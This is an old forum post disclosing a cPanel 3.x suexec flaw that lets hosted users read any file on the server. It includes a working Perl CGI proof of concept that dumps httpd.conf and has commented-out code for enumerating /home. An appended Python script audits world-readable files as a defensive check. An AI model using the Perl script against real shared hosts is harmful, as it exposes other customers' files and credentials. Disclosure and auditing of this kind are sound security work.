IDRU
07-05-2001, 11:56 AM
ATTENTION!
READ THIS MESSAGE CLOSELY!
YESTERDAY OUR PROGRAMMERS DETECTED a big error in the security system of cpanel 3.x!
===
Any user who is registered on a server on which cpanel 3.x is installed can view and copy any file in any folder on this server. :bawling:
==
The Example:
Having written such a script and activated it, the user can view the information stored for the provider on the server in the file /usr/local/apache/conf/httpd.conf:
#!/usr/local/bin/perl
###########################Loading modules####################################
use strict; # Never forget this, it prevents many errors
use CGI qw(:standard); # Why reinvent the wheel?
use CGI::Carp qw(fatalsToBrowser); # All errors go to the browser
my $cgi = new CGI;
print $cgi->header('text/html');
$/ = undef;
open(ff, "< /usr/local/apache/conf/httpd.conf") or die "$!";
my $var = <ff>;
close(ff);
print $var;
#opendir(DIR, "/home") || die "can't opendir: $!";
#my @dots = grep {-d "/home/$_" } readdir(DIR);
#closedir DIR;
#print "$_\n" for @dots;
#open(FILE, "> ../****.txt") or die "$!";
#print FILE $var;
#close(FILE);
By writing such a simple script (it was written in 1 minute!), such a big error in the security system was detected.
The error is in suexec; it gives Nobody/nobody rights to any user.
The Cpanel developers need to find and correct the error immediately.
Excuse my bad English, I still know it very poorly.
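A permission audit for the exposure described in the post above, as an added example that is not part of the original post: it lists the files under a directory that an account matching neither owner nor group can open. It assumes CGI scripts run under a shared account such as nobody; `exposed_files`, `build_sample_tree`, `demo` and the sample tree are constructed for illustration.

```python
import os
import stat
import tempfile

def exposed_files(root):
    """Files under root that an account matching neither owner nor group can open.

    Assumptions: CGI scripts run as a shared account such as nobody, so only
    the "other" permission bits apply, and root itself (e.g. /home) is reachable.
    """
    exposed = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Without o+x on a directory nothing below it can be opened: prune it.
        dirnames[:] = [d for d in dirnames
                       if os.lstat(os.path.join(dirpath, d)).st_mode & stat.S_IXOTH]
        for name in filenames:
            full = os.path.join(dirpath, name)
            mode = os.lstat(full).st_mode
            if stat.S_ISREG(mode) and mode & stat.S_IROTH:
                exposed.append(os.path.relpath(full, root))
    return sorted(exposed)

def build_sample_tree(base):
    """Create a constructed two-user layout with explicit modes."""
    files = {"alice/public_html/config.php": 0o644,  # world-readable
             "alice/public_html/db.inc": 0o600,      # owner only
             "bob/public_html/config.php": 0o644}    # readable, but home is closed
    dirs = {"alice": 0o711, "alice/public_html": 0o755,
            "bob": 0o700, "bob/public_html": 0o755}
    for rel, mode in files.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
        os.chmod(path, mode)
    for rel, mode in dirs.items():
        os.chmod(os.path.join(base, rel), mode)

def demo():
    """Build the sample tree in a temp dir and return the exposed paths."""
    with tempfile.TemporaryDirectory() as base:
        build_sample_tree(base)
        return exposed_files(base)

if __name__ == "__main__":
    for path in demo():
        print("readable by other:", path)
```

In the sample tree only alice's `config.php` is reported: her `db.inc` lacks the other-read bit, and bob's file sits behind a home directory that "other" cannot enter.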
